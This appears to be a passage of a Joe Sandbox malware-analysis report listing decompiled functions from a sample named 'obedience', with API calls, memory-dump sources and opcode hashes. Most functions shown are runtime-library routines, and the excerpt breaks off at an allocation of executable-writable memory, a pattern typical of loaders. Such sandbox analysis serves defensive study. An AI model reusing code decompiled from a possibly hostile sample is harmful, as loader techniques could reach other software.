      • Opcode ID: ab7cb4c8c7d830e1c987375a219b8e05183eee67bae2a6a0faba20256de70036
      • Instruction ID: 75673b8b8ef96fe5343b75f1d018d7f02825121c1262bbd79dd6b8b433f716b9
      • Opcode Fuzzy Hash: ab7cb4c8c7d830e1c987375a219b8e05183eee67bae2a6a0faba20256de70036
      • Instruction Fuzzy Hash: 8FF02E73F0072027EB20966A0CC5B5756D49F457A4F194477F94CFF3D8D6764C014258
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E6ED94600(void* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
      				intOrPtr _v8;
      				char _v12;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				intOrPtr* _t35;
      				void* _t38;
      				void* _t40;
      				intOrPtr* _t42;
      				void* _t46;
      				intOrPtr _t51;
      				intOrPtr* _t54;
      				intOrPtr _t58;
      				signed int _t66;
      				signed int _t71;
      				signed int _t74;
      				void* _t76;
      
      				_t76 = (_t74 & 0xfffffff8) - 0xc;
      				_t46 = __ecx;
      				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) != __ecx + 0x48 || _a16 != 1 ||  *((intOrPtr*)(__ecx + 0x44)) != 0) {
      					_t71 = _a12;
      					_t66 = _a8;
      				} else {
      					_t71 = _a12;
      					_t66 = _a8 + 0xffffffff;
      					asm("adc esi, 0xffffffff");
      				}
      				if( *((intOrPtr*)(_t46 + 0x54)) == 0 || L6ED95000(_t46, _t66, _t71) == 0) {
      					L14:
      					_t35 = _a4;
      					_t51 =  *0x6eda8a6c; // 0xffffffff
      					_t58 =  *0x6eda8a68; // 0xffffffff
      					 *((intOrPtr*)(_t35 + 4)) = _t51;
      					__eflags = 0;
      					 *_t35 = _t58;
      					 *((intOrPtr*)(_t35 + 8)) = 0;
      					 *((intOrPtr*)(_t35 + 0xc)) = 0;
      					 *((intOrPtr*)(_t35 + 0x10)) = 0;
      					return _t35;
      				} else {
      					_t60 = _t66 | _t71;
      					if((_t66 | _t71) != 0) {
      						L9:
      						_push(_a16);
      						_push(_t71);
      						_push(_t66);
      						_push( *((intOrPtr*)(_t46 + 0x54))); // executed
      						_t38 = E6ED96E9A(_t46, _t60, _t66, _t71, _t84); // executed
      						_t76 = _t76 + 0x10;
      						if(_t38 != 0) {
      							goto L14;
      						} else {
      							goto L10;
      						}
      					} else {
      						_t84 = _a16 - 1;
      						if(_a16 == 1) {
      							L10:
      							_t40 = E6ED96F19(_t46,  &_v12, _t66,  *((intOrPtr*)(_t46 + 0x54)),  &_v12); // executed
      							if(_t40 != 0) {
      								goto L14;
      							} else {
      								_t54 =  *((intOrPtr*)(_t46 + 0x10));
      								if( *_t54 == _t46 + 0x48) {
      									 *_t54 =  *((intOrPtr*)(_t46 + 0x3c));
      									 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x20)))) =  *((intOrPtr*)(_t46 + 0x40));
      									 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x30)))) = 0;
      								}
      								_t42 = _a4;
      								 *((intOrPtr*)(_t42 + 8)) = _v12;
      								 *_t42 = 0;
      								 *((intOrPtr*)(_t42 + 4)) = 0;
      								 *((intOrPtr*)(_t42 + 0xc)) = _v8;
      								 *((intOrPtr*)(_t42 + 0x10)) =  *((intOrPtr*)(_t46 + 0x4c));
      								return _t42;
      							}
      						} else {
      							goto L9;
      						}
      					}
      				}
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: __fseeki64
      • String ID:
      • API String ID: 3340294951-0
      • Opcode ID: 734283072c881421535b86914c31ed35a1c4cf24be97b0dabf2bc1f91c5b2db9
      • Instruction ID: e4fc80091236ffeba97b8afa0fc5254cec3493cfc161e9566a87ce9f1c6c420e
      • Opcode Fuzzy Hash: 734283072c881421535b86914c31ed35a1c4cf24be97b0dabf2bc1f91c5b2db9
      • Instruction Fuzzy Hash: 5F3181B1505205CFCB08CF58C89099677F5FF89324F1482AAEC288B396E331E812DF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 86%
      			E6ED9D81F(signed int _a4, signed int _a8, long _a12) {
      				void* _t10;
      				long _t11;
      				long _t12;
      				signed int _t13;
      				signed int _t17;
      				long _t19;
      				long _t24;
      
      				_t17 = _a4;
      				if(_t17 == 0) {
      					L3:
      					_t24 = _t17 * _a8;
      					__eflags = _t24;
      					if(_t24 == 0) {
      						_t24 = _t24 + 1;
      						__eflags = _t24;
      					}
      					goto L5;
      					L6:
      					_t10 = RtlAllocateHeap( *0x6edb089c, 8, _t24); // executed
      					__eflags = 0;
      					if(0 == 0) {
      						goto L7;
      					}
      					L14:
      					return _t10;
      					goto L15;
      					L7:
      					__eflags =  *0x6edb118c;
      					if( *0x6edb118c == 0) {
      						_t19 = _a12;
      						__eflags = _t19;
      						if(_t19 != 0) {
      							 *_t19 = 0xc;
      						}
      					} else {
      						_t11 = L6ED99002(_t10, _t24);
      						__eflags = _t11;
      						if(_t11 != 0) {
      							L5:
      							_t10 = 0;
      							__eflags = _t24 - 0xffffffe0;
      							if(_t24 > 0xffffffe0) {
      								goto L7;
      							} else {
      								goto L6;
      							}
      						} else {
      							_t12 = _a12;
      							__eflags = _t12;
      							if(_t12 != 0) {
      								 *_t12 = 0xc;
      							}
      							_t10 = 0;
      						}
      					}
      					goto L14;
      				} else {
      					_t13 = 0xffffffe0;
      					_t27 = _t13 / _t17 - _a8;
      					if(_t13 / _t17 >= _a8) {
      						goto L3;
      					} else {
      						 *((intOrPtr*)(E6ED987F9(_t27))) = 0xc;
      						return 0;
      					}
      				}
      				L15:
      			}

      Instruction addresses shown beside the decompiled statements (0x00000000 marks lines with no instruction): 0x6ed9d824 0x6ed9d829 0x6ed9d846 0x6ed9d84b 0x6ed9d84d 0x6ed9d84f 0x6ed9d851 0x6ed9d851 0x6ed9d851 0x00000000 0x6ed9d859 0x6ed9d862 0x6ed9d868 0x6ed9d86a 0x00000000 0x00000000 0x6ed9d89e 0x6ed9d8a0 0x00000000 0x6ed9d86c 0x6ed9d86c 0x6ed9d873 0x6ed9d891 0x6ed9d894 0x6ed9d896 0x6ed9d898 0x6ed9d898 0x6ed9d875 0x6ed9d876 0x6ed9d87c 0x6ed9d87e 0x6ed9d852 0x6ed9d852 0x6ed9d854 0x6ed9d857 0x00000000 0x00000000 0x00000000 0x00000000 0x6ed9d880 0x6ed9d880 0x6ed9d883 0x6ed9d885 0x6ed9d887 0x6ed9d887 0x6ed9d88d 0x6ed9d88d 0x6ed9d87e 0x00000000 0x6ed9d82b 0x6ed9d82f 0x6ed9d832 0x6ed9d835 0x00000000 0x6ed9d837 0x6ed9d83c 0x6ed9d845 0x6ed9d845 0x6ed9d835 0x00000000

      APIs
      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6ED99857,6ED962AF,?,00000000,00000000,00000000,?,6ED9826E,00000001,00000214), ref: 6ED9D862
        • Part of subcall function 6ED987F9: __getptd_noexit.LIBCMT ref: 6ED987F9
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: AllocateHeap__getptd_noexit
      • String ID:
      • API String ID: 328603210-0
      • Opcode ID: 6156ed7966baa20c6300c8d694901e12fa7bbd16937729ebfff71cf0937a7f40
      • Instruction ID: 3042090ed80ef95ff065a71edde20812d8ac43adaafa955242c795eb03707c78
      • Opcode Fuzzy Hash: 6156ed7966baa20c6300c8d694901e12fa7bbd16937729ebfff71cf0937a7f40
      • Instruction Fuzzy Hash: 0401D435211212DBFB559FEACC54B9A3B98AFC17A0F108529E869CF5D1DB78D400DE50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00407B24(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
      				long _v8;
      				void* _t12;
      				struct HWND__* _t22;
      				long _t27;
      				CHAR* _t30;
      
      				_v8 = _t27;
      				_t30 = __eax;
      				_t12 = E00402F10();
      				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
      				E00402F00(_t12);
      				return _t22;
      			}

      Instruction addresses shown beside the decompiled statements: 0x00407b2b 0x00407b30 0x00407b32 0x00407b61 0x00407b6a 0x00407b76

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateWindow
      • String ID:
      • API String ID: 716092398-0
      • Opcode ID: be214cb052235d754c96b4bdeccbc1efeff0a586498f2defdb6b5a19ef4b5dcd
      • Instruction ID: 7816b96de73c2626cc947abd71ed5d4f906e0709b5dfdd17496010f52610a920
      • Opcode Fuzzy Hash: be214cb052235d754c96b4bdeccbc1efeff0a586498f2defdb6b5a19ef4b5dcd
      • Instruction Fuzzy Hash: 55F097B2704119BFDB40DE9DDD85E9B77ECEB4C2A4B044169BA0CD7241D574ED1087A4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E6ED96F19(void* __ebx, signed int __edx, void* __edi, intOrPtr _a4, signed int* _a8) {
      				void* __esi;
      				void* __ebp;
      				signed int _t5;
      				signed int _t6;
      				signed int* _t19;
      
      				_t21 = _a4;
      				if(_a4 != 0) {
      					_t19 = _a8;
      					__eflags = _t19;
      					if(__eflags != 0) {
      						_push(_a4);
      						_t5 = E6ED9B010(__ebx, __edx, __edi, _t19, __eflags); // executed
      						 *_t19 = _t5;
      						_t6 = _t5 | 0xffffffff;
      						_t19[1] = __edx;
      						__eflags = (_t5 & __edx) - _t6;
      						if((_t5 & __edx) != _t6) {
      							_t6 = 0;
      							__eflags = 0;
      						}
      					} else {
      						 *((intOrPtr*)(E6ED987F9(__eflags))) = 0x16;
      						_t6 = E6ED987A7() | 0xffffffff;
      					}
      					return _t6;
      				} else {
      					 *((intOrPtr*)(E6ED987F9(_t21))) = 0x16;
      					return E6ED987A7() | 0xffffffff;
      				}
      			}

      Instruction addresses shown beside the decompiled statements: 0x6ed96f1e 0x6ed96f22 0x6ed96f3a 0x6ed96f3d 0x6ed96f3f 0x6ed96f56 0x6ed96f59 0x6ed96f61 0x6ed96f65 0x6ed96f68 0x6ed96f6b 0x6ed96f6d 0x6ed96f6f 0x6ed96f6f 0x6ed96f6f 0x6ed96f41 0x6ed96f46 0x6ed96f51 0x6ed96f51 0x6ed96f73 0x6ed96f24 0x6ed96f29 0x6ed96f38 0x6ed96f38

      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: __getptd_noexit
      • String ID:
      • API String ID: 3074181302-0
      • Opcode ID: cc93c9168983e349e1e60ef21e8c88aff92e49dd319356b20292ea6975efb5fd
      • Instruction ID: 331d2ab67c22f62f070fe1f9637d90dcf66fd21c85c97d50831000ed21b73d22
      • Opcode Fuzzy Hash: cc93c9168983e349e1e60ef21e8c88aff92e49dd319356b20292ea6975efb5fd
      • Instruction Fuzzy Hash: E2F082355646089ACB145FFDDC003AD3AE89F41B74F148B29E47C8B1D0DB70D880B7A4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00405E78(void* __eax) {
      				char _v272;
      				intOrPtr _t14;
      				void* _t16;
      				intOrPtr _t18;
      				intOrPtr _t19;
      
      				_t16 = __eax;
      				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
      					_t3 = _t16 + 4; // 0x400000
      					GetModuleFileNameA( *_t3,  &_v272, 0x105);
      					_t14 = E0040610C(_t19); // executed
      					_t18 = _t14;
      					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
      					if(_t18 == 0) {
      						_t5 = _t16 + 4; // 0x400000
      						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
      					}
      				}
      				_t7 = _t16 + 0x10; // 0x400000
      				return  *_t7;
      			}

      Instruction addresses shown beside the decompiled statements: 0x00405e80 0x00405e86 0x00405e92 0x00405e96 0x00405e9f 0x00405ea4 0x00405ea6 0x00405eab 0x00405ead 0x00405eb0 0x00405eb0 0x00405eab 0x00405eb3 0x00405ebe

      APIs
      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405E96
        • Part of subcall function 0040610C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0048E0A8), ref: 00406127
        • Part of subcall function 0040610C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406145
        • Part of subcall function 0040610C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406163
        • Part of subcall function 0040610C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406181
        • Part of subcall function 0040610C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004061CA
        • Part of subcall function 0040610C: RegQueryValueExA.ADVAPI32(?,0040638C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00406210,?,80000001), ref: 004061E8
        • Part of subcall function 0040610C: RegCloseKey.ADVAPI32(?,00406217,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040620A
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Open$FileModuleNameQueryValue$Close
      • String ID:
      • API String ID: 2796650324-0
      • Opcode ID: 3f735dcb6e91b16ca97a434ce61cc22eca6698f83dcea60d6bc6643c62e100b4
      • Instruction ID: 9bea54296b0376798ba96e320d220f1a413cd18f41f8698404367cacab13d91b
      • Opcode Fuzzy Hash: 3f735dcb6e91b16ca97a434ce61cc22eca6698f83dcea60d6bc6643c62e100b4
      • Instruction Fuzzy Hash: F6E06D71A012108BDB10DF58C9C1A4733D8AB08755F0009A6FC94DF386D3B5DE208BD4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 63%
      			E6EDA2A38(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
      				signed int _v0;
      				void* __ebp;
      				intOrPtr _t9;
      				void* _t10;
      				signed int _t12;
      				signed int _t16;
      				void* _t29;
      
      				_t26 = __esi;
      				_t22 = __edx;
      				if( *0x6edb0020 != 0) {
      					 *0x6edb0020 =  *0x6edb0020 - 1; // executed
      					__eflags =  *0x6edb0020;
      					__imp__EncodePointer(_a4);
      					_t16 =  *0x6edb0020; // 0xa
      					 *((intOrPtr*)(0x6edb1290 + _t16 * 4)) = _t9;
      					return _t9;
      				} else {
      					_t10 = L6ED99BA5(_t9);
      					_t31 = _t10;
      					if(_t10 != 0) {
      						_push(0x16);
      						L6ED99BB2(__ebx, __edx, __edi, __esi, _t31);
      					}
      					if(( *0x6edafe90 & 0x00000002) != 0) {
      						E6ED9862C(_t22, _t26, 3, 0x40000015, 1);
      						_t29 = _t29 + 0xc;
      					}
      					E6ED96A35(3);
      					asm("int3");
      					_t12 =  *0x6edafe90;
      					 *0x6edafe90 =  !_a4 & _t12 | _v0 & _a4;
      					return _t12;
      				}
      			}

      Instruction addresses shown beside the decompiled statements: 0x6eda2a38 0x6eda2a38 0x6eda2a44 0x6eda2a4f 0x6eda2a4f 0x6eda2a55 0x6eda2a5b 0x6eda2a61 0x6eda2a69 0x6eda2a46 0x6ed9d94e 0x6ed9d953 0x6ed9d955 0x6ed9d957 0x6ed9d959 0x6ed9d95e 0x6ed9d966 0x6ed9d971 0x6ed9d976 0x6ed9d976 0x6ed9d97b 0x6ed9d980 0x6ed9d989 0x6ed9d99a 0x6ed9d9a1 0x6ed9d9a1

      APIs
      • RtlEncodePointer.NTDLL(00000004,?,6EDA1FBB,6EDA1F6A,?,6EDA2225,00000000,00000000,00000004,6ED91AA8), ref: 6EDA2A55
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: 46ea9dd351cc6107d4b23e610c9f9ae91fc2c77ae13437ba1dd446b987ee7d84
      • Instruction ID: d03b1a607b1d93e1719d3af9179101e31f95d0186f85d186d402a3a6a33e0219
      • Opcode Fuzzy Hash: 46ea9dd351cc6107d4b23e610c9f9ae91fc2c77ae13437ba1dd446b987ee7d84
      • Instruction Fuzzy Hash: 5BD09EB5854B0CDFEF405F49DA05B253BB6FB873A5F000015D54842522F771D596DE44
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 25%
      			E6ED96A1F(intOrPtr _a4) {
      				void* __ebp;
      				void* _t2;
      				void* _t3;
      				void* _t4;
      				void* _t5;
      				void* _t6;
      				void* _t9;
      
      				_push(0);
      				_push(0);
      				_push(_a4);
      				_t2 = E6ED968DF(_t3, _t4, _t5, _t6, _t9); // executed
      				return _t2;
      			}

      Instruction addresses shown beside the decompiled statements: 0x6ed96a24 0x6ed96a26 0x6ed96a28 0x6ed96a2b 0x6ed96a34

      APIs
      • _doexit.LIBCMT ref: 6ED96A2B
        • Part of subcall function 6ED968DF: __lock.LIBCMT ref: 6ED968ED
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(6EDA9FB8,00000020,6ED96A46,6ED962AF,00000001,00000000,?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED96929
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED9693A
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(-00000004,?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED96960
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED96973
        • Part of subcall function 6ED968DF: DecodePointer.KERNEL32(?,6ED96A77,000000FF,?,6ED99AAF,00000011,6ED962AF,?,6ED981D9,0000000D), ref: 6ED9697D
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: DecodePointer$__lock_doexit
      • String ID:
      • API String ID: 3343572566-0
      • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
      • Instruction ID: 19f1670bcf162805b84e63f108e3114d0fc7f6b298640b72e0a86424548f066a
      • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
      • Instruction Fuzzy Hash: 51B0123258030C33EB201682EC23F5A3F1D87C0B74F240120FA1C1D1E0AAA3BD61A2E9
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • RtlEncodePointer.NTDLL(00000000,6ED9DB9A,6EDB0A18,00000314,00000000,?,?,?,?,?,6ED9A23F,6EDB0A18,Microsoft Visual C++ Runtime Library,00012010), ref: 6ED9810E
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: b21bdfa660eec3bd561f073b24a91d91c14e3998ec49bc29d024ebced09e87a9
      • Instruction ID: 9b8dafc4b1428fa54f9599979c075bdc3c15e8e48e7013af289b8a143f7e903b
      • Opcode Fuzzy Hash: b21bdfa660eec3bd561f073b24a91d91c14e3998ec49bc29d024ebced09e87a9
      • Instruction Fuzzy Hash:
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00401820(signed int __eax, intOrPtr* __ecx, void* __edx) {
      				signed int _v20;
      				void* _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				intOrPtr _t20;
      				void* _t35;
      				intOrPtr* _t39;
      				intOrPtr* _t48;
      				void** _t49;
      				signed int* _t50;
      				void** _t51;
      
      				_t51 =  &_v24;
      				_t39 = __ecx;
      				 *_t51 = __edx;
      				_t49 =  &_v32;
      				_t48 =  &_v36;
      				_t50 =  &_v28;
      				_v24 = __eax & 0xfffff000;
      				_v20 =  *_t51 + __eax + 0x00000fff & 0xfffff000;
      				 *__ecx = _v24;
      				 *((intOrPtr*)(__ecx + 4)) = _v20 - _v24;
      				_t20 =  *0x4905e8; // 0x809c5c
      				 *_t48 = _t20;
      				while(0x4905e8 !=  *_t48) {
      					_t10 =  *_t48 + 8; // 0x0
      					 *_t49 =  *_t10;
      					 *_t50 =  *((intOrPtr*)( *_t48 + 0xc)) +  *_t49;
      					if( *_t49 < _v24) {
      						 *_t49 = _v24;
      					}
      					if( *_t50 > _v20) {
      						 *_t50 = _v20;
      					}
      					if( *_t49 <  *_t50) {
      						_t35 = VirtualAlloc( *_t49,  *_t50 -  *_t49, 0x1000, 4); // executed
      						if(_t35 == 0) {
      							 *_t39 = 0;
      							return 0;
      						}
      					}
      					 *_t48 =  *((intOrPtr*)( *_t48));
      				}
      				return 0x4905e8;
      			}

      Instruction addresses shown beside the decompiled statements (0x00000000 marks lines with no instruction): 0x00401824 0x00401827 0x00401829 0x0040182c 0x00401830 0x00401834 0x00401842 0x00401855 0x0040185d 0x00401867 0x0040186a 0x0040186f 0x004018ce 0x00401875 0x00401878 0x00401881 0x0040188a 0x00401890 0x00401890 0x00401899 0x0040189f 0x0040189f 0x004018a7 0x004018b9 0x004018c0 0x004018c4 0x00000000 0x004018c4 0x004018c0 0x004018cc 0x004018cc 0x004018de

      APIs
      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004018B9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: a9deb49239315326a51815fa9d63636c35655bd5bec25012d4d6e2a3d5a9c179
      • Instruction ID: 126c5d152a3cef9132e3b5fde8a6952f49fe1790d81a79dd5e8025f9b2744f70
      • Opcode Fuzzy Hash: a9deb49239315326a51815fa9d63636c35655bd5bec25012d4d6e2a3d5a9c179
      • Instruction Fuzzy Hash: 2421C3B5604246AFC750DF28C880A5AB7E0FF99350F14892AF998DB394D334EA448B56
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00423758(intOrPtr _a4, intOrPtr _a8) {
      				intOrPtr _v8;
      				void* _v12;
      				char _v16;
      				intOrPtr _t27;
      				void* _t29;
      				intOrPtr* _t48;
      				void _t52;
      
      				_t48 =  &_v16;
      				if( *0x490888 == 0) {
      					_t29 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
      					_v12 = _t29;
